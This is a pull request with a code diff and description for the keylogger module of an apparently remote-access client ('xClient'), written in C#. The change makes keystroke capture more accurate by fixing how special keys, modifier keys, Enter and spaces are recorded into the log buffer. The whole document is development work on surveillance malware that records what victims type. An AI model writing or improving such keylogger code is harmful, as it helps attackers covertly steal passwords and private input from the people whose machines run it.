### PR TITLE
Keylogger special key fix

### DIFF
--- a/Client/Core/Keylogger/Logger.cs
+++ b/Client/Core/Keylogger/Logger.cs
@@ -139,7 +139,9 @@ namespace xClient.Core.Keylogger
                 if (!string.IsNullOrEmpty(filtered))
                 {
                     Debug.WriteLine("OnKeyPress Output: " + filtered);
-                    _ignoreSpecialKeys = true;
+                    if (_pressedKeys.IsModifierKeysSet())
+                        _ignoreSpecialKeys = true;
+
                     _pressedKeyChars.Add(e.KeyChar);
                     _logFileBuffer.Append(filtered);
                 }
@@ -149,8 +151,7 @@ namespace xClient.Core.Keylogger
         private void OnKeyUp(object sender, KeyEventArgs e) //Called third
         {
             _logFileBuffer.Append(HighlightSpecialKeys(_pressedKeys.ToArray()));
-            for (int i = 0; i < _pressedKeyChars.Count; i++)
-                _pressedKeyChars.RemoveAt(i);
+            _pressedKeyChars.Clear();
         }
 
         private string HighlightSpecialKeys(Keys[] keys)
@@ -167,6 +168,7 @@ namespace xClient.Core.Keylogger
                 }
                 else
                 {
+                    names[i] = string.Empty;
                     _pressedKeys.Remove(keys[i]);
                 }
             }


### PR DESCRIPTION
added modifierkey check so we only ignore special key cases if modifier keys were down.  without this, pressing special keys such as dead keys followed by enter, would trigger the second if statement and would ignore displaying [Enter] and sometimes even possibly spaces

after adding this check, everything works accurately